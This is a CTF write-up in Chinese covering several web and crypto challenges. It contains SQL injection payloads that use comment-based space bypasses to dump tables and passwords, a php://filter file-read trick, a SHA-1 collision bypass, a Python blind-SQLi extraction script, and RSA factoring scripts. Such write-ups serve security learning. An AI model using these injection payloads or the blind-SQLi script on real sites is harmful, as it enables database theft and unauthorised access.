CUMTCTF-wp

Web

签到

提示GET一个1,那就 url+?1

提示post一个2

那就post一个

注意的是要2=任意字符才出现源码

审计代码,这里应该是利用file_get_contents()的漏洞直接读网页源码,并且提示flag在flag.php,直接php://filter/read=convert.base64-encode/resource=flag.php,读取base64源码之后解码即可

PD9waHANCgkkZmxhZz0iQ1VNVENURnsxNzkwNTViNC1lOGY1LTQyZDItYmZlNC0wMjdkMTVlOTQ2YjJ9Ijs=

babysql

首先判断是否存在注入username=admin&password=pw'

在后面加上单引号后出现报错提示,确认有注入点

但是继续测试 'or 1=1 #会出现

判断存在黑名单过滤。

接下来就是判断是将什么加入黑名单了,经过字典测试发现是空格,这里可以使用/**/绕过。

先测试有多少列,'union/**/select/**/1,2,3,4,5,6,7# 到第七的时候,页面报错。

'union/**/select/**/1,2,3,4,5,6,7,8# 到第八的时候显示下图,说明一共八列,并且第四列出现回显。

爆表

1
username=admin&password=pw'union/**/select/**/1,2,3,group_concat(TABLE_NAME),5,6,7,8/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=database()#

爆列名

1
username=admin&password=pw'union/**/select/**/1,2,3,group_concat(COLUMN_NAME),5,6,7,8/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME='users'#

user_id,first_name,last_name,user,password,avatar,last_login,failed_login列名很多,选择password

爆flag

1
username=admin&password=pw'union/**/select/**/1,2,3,group_concat(password),5,6,7,8/**/from/**/users#

secret

扫描一下目录发现存在一个www.zip的文件,直接下载得到源码,下面就是一层一层的绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<?php
error_reporting(0);
include_once('flag.php');
if(isset($_GET['param1']))
{
    $str1=$_GET['param1'];
    if(file_get_contents($str1)!=='Suvin_wants_a_girlfriend')
        die("Suvin doesn't like you");
    if(isset($_GET['param2'])){
        $str2=$_GET['param2'];
        if(!is_numeric($str2))
            die('Suvin prefers strings of Numbers');
        else if($str2<3600*24*30)
            die('Suvin says the num is too short');
        else if($str2>3600*24*31)
            die('Suvin says the num is too long');
        else {
            echo "Suvin says he's falling in love with you!"."</br>";
            sleep(intval($str2)); 
        }
        if (isset($_POST['param1']) && isset($_POST['param2'])) {
            $str1=$_POST['param1'];
            $str2=$_POST['param2'];
            if(strlen($str1)>1000)
                die("It's too long");
            if(((string)$str1!==(string)$str2)&&(sha1($str1)===sha1($str2)))
                echo $flag;
            else 
                die("It's so similar to md5");
        }
    }
}
?>

首先get方式获取两个参数,param1要等于那个字符串,这里使用php的data伪协议

param2要在3600*24*303600*24*31之间,可以取2.6e6,这两个参数绕过后,就要绕过下面的post方式上传的两个值

对parame1的长度进行了限制,并且两参数的字符串形式不相等,sha1的值要相等,首先想到的是与md5函数一样,使用数组绕过,但是这题没那么简单,试了很多次都不行。网上搜了一下,发现了一个很类似的题目(sha1弱碰撞),其中也给出符合要求的字符串。

点这里

完整的payload:

?param1=data://text/plain;base64,U3V2aW5fd2FudHNfYV9naXJsZnJpZW5k&param2=0.26e7

1
2
POST:
param1=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1&param2=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1

还有一个很坑的地方,hackbar上传时没有作用,只能用bp抓包上传,抓包时注意先随便post一个参数,这样数据包才是post方式,然后贴上上面的两个参数值

babysql2

查询语句与第一个注入相同,但是这题不给回显,猜测是盲注,但是好像过滤了更多的关键字

在1的基础上额外过滤了 ‘ , ascii , mid , substr ,关闭了报错回显和输出,但是查询成功或者失败 回显不同,因此可以bool注入。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
url = 'http://219.219.61.234:20004/'
password = ""
string = [ord(i) for i in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz!_@-}{']#将字母转换为ascii码
a = '0x5e'   # '\'的ascii码值
while(1):
    for j in string:
        if (hex(j)[2:]=='7b'):
            str='5c'+hex(j)[2:]  #将'{'转义,
        else:
            str=hex(j)[2:]

        time.sleep(0.1)

        payload  ="||/**/(select/**/password/**/from/**/users/**/limit/**/9,1)/**/regexp/**/binary/**/%s/**/#" % (a + str)
# 盲注的查询语句 regexp binary 是区分大小写的正则匹配
        data ={"username":"\\","password":payload}
        print(data)
        r = requests.post(url,data=data) #访问
        if "success" in r.text:
            #print(r.text)
            password+=chr(j)
            print(password)
            a+=str      		
            break
    if "wrong" in r.text:
        break
print(password)

Crypto

幼儿园的密码题

先转换为十进制后在线分解后直接上脚本

http://www.factordb.com/ 在线分解网址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import binascii
import sys
sys.setrecursionlimit(1000000)
def ByteToHex(bins):
  return ''.join(["%02X" % x for x in bins]).strip()
def n2s(num):
  t = hex(num)[2:-1]  # python
  if len(t) % 2 == 1:
    t = '0' + t
  \#print(t)
  return(binascii.a2b_hex(t).decode('latin1'))
def egcd(a, b):
  if a == 0:
    return (b, 0, 1)
  else:
    g, y, x = egcd(b % a, a)
    return (g, x - (b // a) * y, y)
def modinv(a, m):
  g, x, y = egcd(a, m)
  if g != 1:
    print('modular inverse does not exist')
    return 'null'
  else:
    return x % m
c = 40448992051548719008529549070468060415257485938698092782029814901918646701101
p = 328413456989577256301798468872388310877
q = 324350545929838254331191385863847627003
e = 65537
n = p * q
d = modinv(e, (p - 1) * (q - 1))
m = pow(c, d, n)

print (m)

数字转字符的脚本

1
2
3
4
5
6
7
8
import binascii
def n2s(num):
  t = hex(num)[2:-1]  # python
  if len(t) % 2 == 1:
    t = '0' + t
  \#print(t)
  return(binascii.a2b_hex(t).decode('latin1'))
print(n2s(a)) #a为上一个脚本计算出的数字

小学生的密码题

初中生的密码题

次题与幼儿园的类似,但是由于n过大,试了很多工具都无法分解。

仔细看题会发现这题的条件给的比较多,知道p-q

于是想到了(p+q)^2-(p-q)^2=4pq=4n,可以算出p+q,之后解出p,q

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
算p,q的脚本
# -*- coding = utf - 8 -*-
#@Time : 2020/9/24 21:55
#@Author : sunzy
#@File : su.py
import gmpy2
n = 848636981711330203910533960833570455347986345690792054016750216327432282027653737545502731789145875082064910377585125307004316982829408169391535303284775605083341204318559328114199464933306718077358184455649201353500348066849356092072732731595459583112558025395897556853371526959018489282157258240657926428930442774978485014507505784476690845099227369478496626645851076679385883251594929952035661085961598388544126711902983065521128172978259778754970695037278639045266353840536697343675638366506183715240679610094431082173271579344392346412454309134164388560354168918421706979410826758333952277436780339926907679282601846125790204266958409253210507301575619878252146515542791259716201124558373197816421305046774535734189567481599690381428371580696486054135486182509762880877363356256116336930055483318415453999460475103494980748558993889459677374574910745242385711928489669790527969454801533682757508950065697410745338257289717598141031203566419840587221470340637486034911686587695890702753064441476917845870069997649577034149354150224132983093069444866234262542625997399303875938451386377357399819123134018307163799151847997740448433278364764592560369020005024859119937315831252233159882960532854116233641920659786799836075681746397
p_sub_q = -3052070064538177039316204197190587772604720575847063904632214287646067455053231054471310322671549035272267675314294983896730810628462303176753740499536650509067032550999649642312183001467325569057721784454105443122299599368088210370664912463545058026638059476152117310712548608873763578306375998350729040793659145108802752313856984121444358377361896069243965149432626400631035486457915394853541729904150184876824863707417199152978276518660302136096681722191666079256269268999389217644896376343059852127338281844120448782198891495913902938174313438531667749920307775936355947018946620720978288405012504885451732231636
x = (4*n+p_sub_q*p_sub_q)

gmpy2.mpz(x)
#p_add_q = gmpy2.iroot(x, 2)
p_add_q = 58342634998122692674032973234620896020471694068399847453520741898744437026570834277134765347908181270295928479896424327076716339778780713227054670754114006755614107059128760453507315091935855120450792252194791430498450216725579392051311373554303029775579999984765816108626868293630358812164765119470747267373609041885833415440716244492402495944064255436477147868576748300862501670473856373437423326957856588782039066794320093570665076624361151742737113922376038763268964187459938086360191752544167623804772397201519904950840301831333585995087985697059748872751988663760065650743406672809203915981347563824970092886078
# print(p_add_q)
y=(p_sub_q+p_add_q)
z=(p_add_q-p_sub_q)

print(y>>1)
print(z>>1)

知道p,q后,此题的解法与幼儿园的解法相同

菜鸡只会这么多。。。